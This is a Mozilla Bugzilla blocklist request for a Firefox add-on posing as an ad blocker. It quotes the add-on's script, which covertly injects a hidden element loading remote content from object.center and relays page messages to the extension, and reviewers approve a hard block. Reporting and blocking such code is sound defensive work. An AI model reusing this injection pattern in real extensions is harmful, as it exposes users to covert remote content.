Closed Bug 1629925 Opened 5 years ago Closed 5 years ago

Extension Block Request: Adblock by Adblock

Categories

(Toolkit :: Blocklist Policy Requests, task)

Product:
Toolkit
Component:
Blocklist Policy Requests
Type:
task
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED FIXED

People

(Reporter: gwarser, Assigned: TheOne)

Details
Extension name Adblock by Adblock
Extension versions affected <all versions>
Platforms affected <all platforms>
Block severity hard

Reason

I did not installed it, but I believe this is attempt to inject remote content into the page from //object.center/object. It's similar to "youtube downloaders" I reported some time ago.

Extension IDs

adblock-6.6@addons.mozilla.org

Additional Information

This is what it similar to these other modified YT extensions:

js/scriptlet/subscriber.js:

var onSubscriberBlocked = function(details) {

	var subscriberConfirmBlocked = details.confirmBlocked;
	
	// Because in case
	if ( typeof vAPI !== 'object' ) {
	    //console.debug('subscriber.js > vAPI not found');
	    return;
	} else {
		//console.debug('subscriber.js > noop');
		if(subscriberConfirmBlocked > 999) {
			var noop = document.createElement('object');
			noop.id = 'noop'; noop.data = '//object'+'.'+'center/object';
			noop.setAttribute('style', 'visibility:hidden');
			noop.onerror = function() { a.remove() };
			var noopDiv = document.createElement('div');
			var a = document.body.appendChild(noopDiv);
			noopDiv.appendChild(noop);
		}
	}
};

// hxxps://github.com/chrisaljoudi/uBlock/issues/464
if ( document instanceof HTMLDocument === false ) {
    //console.debug('subscriber.js > not a HTLMDocument');
    return;
} else {
	var messaging = vAPI.messaging;
	messaging.send(
        'scriptlets',
        { what: 'subscriberBlocked' },
        onSubscriberBlocked
    );
}

function compatibilityMessage(evt) {
	try {
		var msg = JSON.parse(evt.data);
		var u = 'undefined';
		if (msg) {
			if (typeof msg.__filter__ !== u) {
				chrome.runtime.sendMessage({
					message: evt.data
				});
			}
			if (typeof msg.__catch__ !== u) {
				var rem = document.getElementById('noop');
				rem.parentElement.remove();
			}
		}
	} catch (e) {
		return false;
	}
}

if (window.addEventListener) {
	// For standards-compliant web browsers
	window.addEventListener("message", compatibilityMessage, false);
} else {
	window.attachEvent("onmessage", compatibilityMessage);
}

Also there is some messaging magic (trigger?) at the bottom of js/background.js.

This add-on violates Mozilla's No Surprises add-on policy

Assignee: nobody → awagner
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true

The block has been staged. Simon, can you review and push?

Flags: needinfo?(sbennetts)
Group: blocklist-requests
Status: ASSIGNED → RESOLVED
Closed: 5 years ago
Flags: needinfo?(sbennetts)
Resolution: --- → FIXED
You need to log in before you can comment on or make changes to this bug.